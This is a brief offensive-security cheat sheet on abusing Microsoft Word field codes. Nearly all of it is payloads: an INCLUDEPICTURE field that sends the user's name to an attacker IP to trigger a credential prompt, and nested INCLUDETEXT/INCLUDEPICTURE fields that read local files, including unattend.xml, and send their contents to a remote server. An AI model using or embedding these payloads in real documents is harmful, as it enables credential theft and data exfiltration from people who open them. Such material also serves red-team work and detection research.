Field Abuse
Credential Popup
{ INCLUDEPICTURE \d "http://<ip>/{ USERNAME \* MERGEFORMAT}"\* MERGEFORMATINET }Arbitrary File Read
{ INCLUDEPICTURE { QUOTE "http://server" & { FILENAME \p } & { INCLUDETEXT "c:\read\file.txt" } } \d }{ MACROBUTTON UpdateFields { INCLUDEPICTURE \d "http://picture.com/picture.png" \* MERGEFORMATIINET}{ INCLUDEPICTURE "http://<ip>/?{ INCLUDETEXT "c:\\windows\\panther\\unattend.xml" \c XML \* MERGEFORMAT}}" \d \* MERGEFORMAT }}Resources
Last updated